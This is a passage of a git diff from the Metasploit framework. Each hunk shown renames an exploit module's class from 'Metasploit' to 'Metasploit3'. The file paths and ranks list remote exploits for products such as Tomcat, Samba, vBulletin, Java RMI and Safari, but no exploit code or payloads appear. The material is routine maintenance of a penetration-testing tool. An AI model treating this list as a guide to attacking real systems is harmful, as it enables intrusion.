Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/stunshell_exec.rb b/modules/exploits/multi/http/stunshell_exec.rb index 2dc2d9a30e..33e003d6bd 100644 --- a/modules/exploits/multi/http/stunshell_exec.rb +++ b/modules/exploits/multi/http/stunshell_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sun_jsws_dav_options.rb b/modules/exploits/multi/http/sun_jsws_dav_options.rb index 05cc0a51ff..4ef79cf5fa 100644 --- a/modules/exploits/multi/http/sun_jsws_dav_options.rb +++ b/modules/exploits/multi/http/sun_jsws_dav_options.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_auth_file_upload.rb b/modules/exploits/multi/http/sysaid_auth_file_upload.rb index 6a03a504e7..2d879862d2 100644 --- a/modules/exploits/multi/http/sysaid_auth_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_auth_file_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb index dc4d89d2e3..d2ecb468b3 100644 --- a/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb +++ b/modules/exploits/multi/http/sysaid_rdslogs_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/testlink_upload_exec.rb b/modules/exploits/multi/http/testlink_upload_exec.rb index 8d645f6a5c..b5096db680 100644 --- a/modules/exploits/multi/http/testlink_upload_exec.rb +++ b/modules/exploits/multi/http/testlink_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index 0699cd1088..75c6beda9c 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/tomcat_mgr_upload.rb b/modules/exploits/multi/http/tomcat_mgr_upload.rb index 5badf00211..1098c9140f 100644 --- a/modules/exploits/multi/http/tomcat_mgr_upload.rb +++ b/modules/exploits/multi/http/tomcat_mgr_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] } diff --git a/modules/exploits/multi/http/traq_plugin_exec.rb b/modules/exploits/multi/http/traq_plugin_exec.rb index ea22ca805c..7c972720cb 100644 --- a/modules/exploits/multi/http/traq_plugin_exec.rb +++ b/modules/exploits/multi/http/traq_plugin_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/uptime_file_upload_1.rb b/modules/exploits/multi/http/uptime_file_upload_1.rb index 966aa7ccef..7647d7b20d 100644 --- a/modules/exploits/multi/http/uptime_file_upload_1.rb +++ b/modules/exploits/multi/http/uptime_file_upload_1.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/v0pcr3w_exec.rb b/modules/exploits/multi/http/v0pcr3w_exec.rb index afb58a7607..1c94eb7118 100644 --- a/modules/exploits/multi/http/v0pcr3w_exec.rb +++ b/modules/exploits/multi/http/v0pcr3w_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbseo_proc_deutf.rb b/modules/exploits/multi/http/vbseo_proc_deutf.rb index 246a256409..be7f303cd8 100644 --- a/modules/exploits/multi/http/vbseo_proc_deutf.rb +++ b/modules/exploits/multi/http/vbseo_proc_deutf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vbulletin_unserialize.rb b/modules/exploits/multi/http/vbulletin_unserialize.rb index 017d1be37f..15f48e6c1a 100644 --- a/modules/exploits/multi/http/vbulletin_unserialize.rb +++ b/modules/exploits/multi/http/vbulletin_unserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb index d35a20b553..88d5e8285f 100644 --- a/modules/exploits/multi/http/visual_mining_netcharts_upload.rb +++ b/modules/exploits/multi/http/visual_mining_netcharts_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_install_rce.rb b/modules/exploits/multi/http/vtiger_install_rce.rb index ce72e96bbb..3e76c223bf 100644 --- a/modules/exploits/multi/http/vtiger_install_rce.rb +++ b/modules/exploits/multi/http/vtiger_install_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote # Application database configuration is overwritten Rank = ManualRanking diff --git a/modules/exploits/multi/http/vtiger_php_exec.rb b/modules/exploits/multi/http/vtiger_php_exec.rb index 72e4fac7dd..92472d92bd 100644 --- a/modules/exploits/multi/http/vtiger_php_exec.rb +++ b/modules/exploits/multi/http/vtiger_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/vtiger_soap_upload.rb b/modules/exploits/multi/http/vtiger_soap_upload.rb index e20c1e8549..6769172a7a 100644 --- a/modules/exploits/multi/http/vtiger_soap_upload.rb +++ b/modules/exploits/multi/http/vtiger_soap_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include REXML diff --git a/modules/exploits/multi/http/webpagetest_upload_exec.rb b/modules/exploits/multi/http/webpagetest_upload_exec.rb index 01bebdfddb..8531ee69dc 100644 --- a/modules/exploits/multi/http/webpagetest_upload_exec.rb +++ b/modules/exploits/multi/http/webpagetest_upload_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/wikka_spam_exec.rb b/modules/exploits/multi/http/wikka_spam_exec.rb index 3e543d43b5..18503fd504 100644 --- a/modules/exploits/multi/http/wikka_spam_exec.rb +++ b/modules/exploits/multi/http/wikka_spam_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/x7chat2_php_exec.rb b/modules/exploits/multi/http/x7chat2_php_exec.rb index c394676a78..4bbe7f9e23 100644 --- a/modules/exploits/multi/http/x7chat2_php_exec.rb +++ b/modules/exploits/multi/http/x7chat2_php_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zemra_panel_rce.rb b/modules/exploits/multi/http/zemra_panel_rce.rb index 38a26d2f72..57fdaadb76 100644 --- a/modules/exploits/multi/http/zemra_panel_rce.rb +++ b/modules/exploits/multi/http/zemra_panel_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb index 7c8cb704ff..b22c77322b 100644 --- a/modules/exploits/multi/http/zenworks_configuration_management_upload.rb +++ b/modules/exploits/multi/http/zenworks_configuration_management_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/http/zenworks_control_center_upload.rb b/modules/exploits/multi/http/zenworks_control_center_upload.rb index 3bf5f7e330..f82eb98b9a 100644 --- a/modules/exploits/multi/http/zenworks_control_center_upload.rb +++ b/modules/exploits/multi/http/zenworks_control_center_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb index 2f0e5d9af0..9fa8a71709 100644 --- a/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb +++ b/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb @@ -8,7 +8,7 @@ require 'msf/core/exploit/php_exe' require 'nokogiri' require 'uri' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::FileDropper diff --git a/modules/exploits/multi/ids/snort_dce_rpc.rb b/modules/exploits/multi/ids/snort_dce_rpc.rb index 2856e8f28c..04491e6dc0 100644 --- a/modules/exploits/multi/ids/snort_dce_rpc.rb +++ b/modules/exploits/multi/ids/snort_dce_rpc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Capture diff --git a/modules/exploits/multi/misc/arkeia_agent_exec.rb b/modules/exploits/multi/misc/arkeia_agent_exec.rb index ced7e46e5b..5f709764b8 100644 --- a/modules/exploits/multi/misc/arkeia_agent_exec.rb +++ b/modules/exploits/multi/misc/arkeia_agent_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/batik_svg_java.rb b/modules/exploits/multi/misc/batik_svg_java.rb index 5abc980108..e1b3ec975e 100644 --- a/modules/exploits/multi/misc/batik_svg_java.rb +++ b/modules/exploits/multi/misc/batik_svg_java.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb index 23b754fc74..fcecbbebdf 100644 --- a/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb +++ b/modules/exploits/multi/misc/hp_data_protector_exec_integutil.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/hp_vsa_exec.rb b/modules/exploits/multi/misc/hp_vsa_exec.rb index 5933825e76..01ea41fc06 100644 --- a/modules/exploits/multi/misc/hp_vsa_exec.rb +++ b/modules/exploits/multi/misc/hp_vsa_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/indesign_server_soap.rb b/modules/exploits/multi/misc/indesign_server_soap.rb index da373854fd..ecb6560c47 100644 --- a/modules/exploits/multi/misc/indesign_server_soap.rb +++ b/modules/exploits/multi/misc/indesign_server_soap.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/misc/java_jdwp_debugger.rb b/modules/exploits/multi/misc/java_jdwp_debugger.rb index 00f06ea3fc..2304aa8855 100644 --- a/modules/exploits/multi/misc/java_jdwp_debugger.rb +++ b/modules/exploits/multi/misc/java_jdwp_debugger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/java_jmx_server.rb b/modules/exploits/multi/misc/java_jmx_server.rb index 61fe569a99..2823fe48f0 100644 --- a/modules/exploits/multi/misc/java_jmx_server.rb +++ b/modules/exploits/multi/misc/java_jmx_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/misc/java_rmi_server.rb b/modules/exploits/multi/misc/java_rmi_server.rb index bd5dcafbf6..de41281438 100644 --- a/modules/exploits/multi/misc/java_rmi_server.rb +++ b/modules/exploits/multi/misc/java_rmi_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Java::Rmi::Client diff --git a/modules/exploits/multi/misc/legend_bot_exec.rb b/modules/exploits/multi/misc/legend_bot_exec.rb index b679d41b85..ab1dd0e15b 100644 --- a/modules/exploits/multi/misc/legend_bot_exec.rb +++ b/modules/exploits/multi/misc/legend_bot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/openview_omniback_exec.rb b/modules/exploits/multi/misc/openview_omniback_exec.rb index 3cae3a0f13..c15c193ead 100644 --- a/modules/exploits/multi/misc/openview_omniback_exec.rb +++ b/modules/exploits/multi/misc/openview_omniback_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/pbot_exec.rb b/modules/exploits/multi/misc/pbot_exec.rb index a14dbb5a89..1dab5491c3 100644 --- a/modules/exploits/multi/misc/pbot_exec.rb +++ b/modules/exploits/multi/misc/pbot_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb index 1765c9d1f2..501df43124 100644 --- a/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb +++ b/modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb index d04e89ecd7..ed53e0b7f2 100644 --- a/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb +++ b/modules/exploits/multi/misc/ra1nx_pubcall_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb index 40fe44abd5..b20a74ef78 100644 --- a/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb +++ b/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/misc/w3tw0rk_exec.rb b/modules/exploits/multi/misc/w3tw0rk_exec.rb index 0c5823f27f..9681bb3da0 100644 --- a/modules/exploits/multi/misc/w3tw0rk_exec.rb +++ b/modules/exploits/multi/misc/w3tw0rk_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb index 820193d539..ee804483e5 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb index a063dfcbcf..18db711cc3 100644 --- a/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb +++ b/modules/exploits/multi/misc/wireshark_lwres_getaddrbyname_loop.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/misc/zend_java_bridge.rb b/modules/exploits/multi/misc/zend_java_bridge.rb index 979a7a6934..a433889c5e 100644 --- a/modules/exploits/multi/misc/zend_java_bridge.rb +++ b/modules/exploits/multi/misc/zend_java_bridge.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer diff --git a/modules/exploits/multi/ntp/ntp_overflow.rb b/modules/exploits/multi/ntp/ntp_overflow.rb index e175aa6b5a..5b0e336fc0 100644 --- a/modules/exploits/multi/ntp/ntp_overflow.rb +++ b/modules/exploits/multi/ntp/ntp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb index d6c1d2f893..a6883a67ca 100644 --- a/modules/exploits/multi/php/php_unserialize_zval_cookie.rb +++ b/modules/exploits/multi/php/php_unserialize_zval_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/multi/realserver/describe.rb b/modules/exploits/multi/realserver/describe.rb index 94694007e1..c6134b819a 100644 --- a/modules/exploits/multi/realserver/describe.rb +++ b/modules/exploits/multi/realserver/describe.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/multi/samba/nttrans.rb b/modules/exploits/multi/samba/nttrans.rb index d11f39c71f..6f1f3652da 100644 --- a/modules/exploits/multi/samba/nttrans.rb +++ b/modules/exploits/multi/samba/nttrans.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/samba/usermap_script.rb b/modules/exploits/multi/samba/usermap_script.rb index f23d4e4789..24a37cc018 100644 --- a/modules/exploits/multi/samba/usermap_script.rb +++ b/modules/exploits/multi/samba/usermap_script.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index f4ed147013..ffeb54e5a4 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Powershell diff --git a/modules/exploits/multi/ssh/sshexec.rb b/modules/exploits/multi/ssh/sshexec.rb index d6f83697ba..51a57cbc44 100644 --- a/modules/exploits/multi/ssh/sshexec.rb +++ b/modules/exploits/multi/ssh/sshexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/svn/svnserve_date.rb b/modules/exploits/multi/svn/svnserve_date.rb index b0c858be89..7f5a0f9234 100644 --- a/modules/exploits/multi/svn/svnserve_date.rb +++ b/modules/exploits/multi/svn/svnserve_date.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/http/client' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Brute diff --git a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb index 2a6a0d8015..d7b0a59908 100644 --- a/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb +++ b/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking def initialize(info = {}) diff --git a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb index f501babeda..b22a3d9646 100644 --- a/modules/exploits/multi/vnc/vnc_keyboard_exec.rb +++ b/modules/exploits/multi/vnc/vnc_keyboard_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking WINDOWS_KEY = "\xff\xeb" diff --git a/modules/exploits/multi/vpn/tincd_bof.rb b/modules/exploits/multi/vpn/tincd_bof.rb index ff72c37ab7..d391ce8da5 100644 --- a/modules/exploits/multi/vpn/tincd_bof.rb +++ b/modules/exploits/multi/vpn/tincd_bof.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'securerandom' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::EXE diff --git a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb index 54640f4c96..786a20d57a 100644 --- a/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb +++ b/modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb @@ -6,7 +6,7 @@ require 'timeout' require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/netware/smb/lsass_cifs.rb b/modules/exploits/netware/smb/lsass_cifs.rb index f5c5c658fc..04c141d2a7 100644 --- a/modules/exploits/netware/smb/lsass_cifs.rb +++ b/modules/exploits/netware/smb/lsass_cifs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/netware/sunrpc/pkernel_callit.rb b/modules/exploits/netware/sunrpc/pkernel_callit.rb index c8a13b3688..0ab1da752a 100644 --- a/modules/exploits/netware/sunrpc/pkernel_callit.rb +++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/osx/afp/loginext.rb b/modules/exploits/osx/afp/loginext.rb index 743f8fe02e..f3ec48b721 100644 --- a/modules/exploits/osx/afp/loginext.rb +++ b/modules/exploits/osx/afp/loginext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/osx/arkeia/type77.rb b/modules/exploits/osx/arkeia/type77.rb index 78143a48dc..45f1f5cd58 100644 --- a/modules/exploits/osx/arkeia/type77.rb +++ b/modules/exploits/osx/arkeia/type77.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Arkeia diff --git a/modules/exploits/osx/browser/mozilla_mchannel.rb b/modules/exploits/osx/browser/mozilla_mchannel.rb index 0b8e001f90..c7331b84ea 100644 --- a/modules/exploits/osx/browser/mozilla_mchannel.rb +++ b/modules/exploits/osx/browser/mozilla_mchannel.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/osx/browser/safari_file_policy.rb b/modules/exploits/osx/browser/safari_file_policy.rb index a008addb19..e00fd67998 100644 --- a/modules/exploits/osx/browser/safari_file_policy.rb +++ b/modules/exploits/osx/browser/safari_file_policy.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/service_manager' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::FtpServer diff --git a/modules/exploits/osx/browser/safari_metadata_archive.rb b/modules/exploits/osx/browser/safari_metadata_archive.rb index 371471477b..27f17742a8 100644 --- a/modules/exploits/osx/browser/safari_metadata_archive.rb +++ b/modules/exploits/osx/browser/safari_metadata_archive.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # diff --git a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb index 5b6141c8e3..3ba0b94a96 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_applescript_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb index 1325b10cb3..b3f464b21a 100644 --- a/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb +++ b/modules/exploits/osx/browser/safari_user_assisted_download_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Exploit::Remote +class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::EXE diff --git a/modules/exploits/osx/browser/software_update.rb b/modules/exploits/osx/browser/software_update.rb index 155a0f5e0d..d360a35626 